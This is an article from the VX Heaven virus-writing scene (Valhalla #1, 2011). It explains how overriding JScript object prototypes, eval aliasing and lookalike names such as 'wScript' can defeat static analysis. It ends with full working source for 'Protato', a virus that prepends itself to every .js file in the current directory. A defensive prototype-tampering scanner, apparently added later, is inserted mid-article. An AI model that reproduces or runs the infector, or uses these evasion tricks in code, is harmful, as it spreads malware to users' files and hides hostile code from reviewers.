
VX Heaven


JScript Prototypes

roy g biv
Valhalla #1
February 2011


What is a prototype?

JScript object methods use function prototypes which are the default handler when the method is called. We can create new methods for some objects by declaring a prototype with the name that we want to use. We can also change the handler for existing methods in some objects by declaring a prototype with the same name as that method.

Which objects?

We can add and change any method for these objects: Array, Boolean, Date, Function, Number, Object, String. That allows us to make a big problem for static analysis, because the method call might run something entirely different from what it ran before.

How to change the prototype?

There are two ways that we can change it. One way is to declare a function that will run. The function can be anonymous, and it can do anything that the script can do normally. It looks like this:

        Object.prototype.bar=function(){WScript.echo("Oops!")}
 

Here I use "Object" as the object, and create a new method called "bar" which will display the message whenever the method is called. To call the method, we have to create a new object first, and the new object will have the changes, like this:

        foo=new Object
 

Then we call the method as usual:

        foo.bar()
 

and the message will display. We can change an existing method in the same way, like this:

        Date.prototype.getYear=function(){WScript.echo("Oops!")}
 

Then we create the object and call the method as usual, like this:

        foo=new Date
        foo.getYear()
 

It looks like it would return the current year, but instead it displays the message. Of course, you can pass parameters to the function if you declare them to the function, like this:

        String.prototype.fromCharCode=function(r){WScript.echo(r)}
        foo=new String
        foo.fromCharCode("Oops!")
 

That helps us to make more problems for static analysis, because it is hard to see which parameters are used. The other way to change the prototype is to include the code without the function declaration. Then the code will be called during object construction and there is no need to call the prototype at all!

        Array.prototype.r=WScript.echo("Oops!")
        new Array
 

and the message will display. This can execute only one command, but if you use "eval" there, and pass your code as a parameter, then you can run as much as you want, like this:

        Array.prototype.r=eval
        foo = new Array
        foo.r("WScript.echo('Oops!')")
 

Another thing that we can do is to create a new object with a similar name to another object, and create a prototype with the same name as a "safe" method. One obvious choice for this is WScript. Since JScript is case-sensitive, we can create an object called "Wscript" or "wScript" which looks similar if you are not paying attention. Then we can create the "echo" prototype, and it looks like the code will print a message, but it's not the right one, like this:

        Date.prototype.echo=function(){WScript.echo("Oops!")}
        wScript=new Date
        wScript.echo("unused")
 

Best of all, the code that is assigned to the prototype can be read back, so we do not need to carry our own source code, like this:

        Boolean.prototype.toString=function(r){WScript.echo(r)}
        foo = new Boolean
        WScript.echo(foo.toString)
 

will display "function(r){WScript.echo(r)}".
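
For anyone reviewing scripts, the patterns described so far can be triaged statically. The following is an added example, not code from the original article: a line-based scanner that flags assignments to the prototypes of the seven objects listed above, eval aliasing, and identifiers that differ from WScript only by letter case. The names findPrototypeTampering, classify and SAMPLE are hypothetical, and the scanning runtime's own built-ins are assumed to stand in for JScript's.

```javascript
// Added example, not from the original article. All names are hypothetical.
const BUILTINS = ["Array", "Boolean", "Date", "Function", "Number", "Object", "String"];
const PROTO_ASSIGN = new RegExp(
  "\\b(" + BUILTINS.join("|") + ")\\s*\\.\\s*prototype\\s*\\.\\s*([A-Za-z_$][\\w$]*)\\s*=(?!=)\\s*(.*)");

function classify(obj, name, rhs) {
  const ctor = globalThis[obj];
  // Assumption: the scanning runtime's own built-ins stand in for JScript's.
  const shadows = name in ctor.prototype || Object.prototype.hasOwnProperty.call(ctor, name);
  if (/^eval\s*;?\s*$/.test(rhs)) return "eval-alias";
  if (/^function\b/.test(rhs)) return shadows ? "shadows-native-method" : "adds-method";
  // Not a function literal: a call here runs without any later method call.
  return /\(/.test(rhs) ? "call-as-value" : "other-value";
}

function findPrototypeTampering(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    const m = PROTO_ASSIGN.exec(text);
    if (m) {
      findings.push({ line: i + 1, kind: classify(m[1], m[2], m[3].trim()),
                      target: m[1] + ".prototype." + m[2] });
    }
    // Identifiers that differ from the real host object only by letter case.
    const fake = (text.match(/[A-Za-z_$][\w$]*/g) || [])
      .find((id) => id !== "WScript" && id.toLowerCase() === "wscript");
    if (fake) findings.push({ line: i + 1, kind: "lookalike-host-object", target: fake });
  });
  return findings;
}

// Constructed sample built from the article's harmless echo snippets.
const SAMPLE = [
  'Object.prototype.bar=function(){WScript.echo("Oops!")}',
  'Date.prototype.getYear=function(){WScript.echo("Oops!")}',
  'String.prototype.fromCharCode=function(r){WScript.echo(r)}',
  'Array.prototype.r=WScript.echo("Oops!")',
  'Array.prototype.r=eval',
  'wScript=new Date',
  'foo.getYear()',
].join("\n");

console.log(findPrototypeTampering(SAMPLE));
```

A line-based regex is triage rather than a parser; a production check would walk the script's syntax tree and resolve every call site against the findings.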

Let's see the code.

Date.prototype.r=function()
{
  /*Protato - roy g biv 22/02/11*/
  a=new ActiveXObject("scripting.filesystemobject")
  for(b=new Enumerator(a.getfolder(".").files);!b.atEnd();b.moveNext())
                                                //demo version, current directory only
  {
    if(a.getextensionname(c=b.item()).toLowerCase()=="js")
      try
      {
        d=a.opentextfile(c)                     //open potential victim
        e=d.read(1)                             //read first character, keep for later
        if(e!="D")                              //check for infection marker
          try
          {
            e+=d.readall()                      //read entire file
            f=c.attributes                      //save attributes
            c.attributes=0                      //remove any read-only attribute
            g=a.createtextfile(c)               //open file for writing
            g.write("Date.prototype.r="+r.r+";r=new Date;r.r();"+e)
                                                //prepend to file
            g.close()                           //close file (write mode)
            c.attributes=f                      //restore attributes
          }
          catch(z)
          {
          }
        d.close()                               //close file (read mode)
      }
      catch(z)
      {
      }
  }
}
r=new Date
r.r()
 

Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - izee - jqwerty - Malum - Obleak - Prototype - Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna - Whitehead

rgb/defjam feb 2011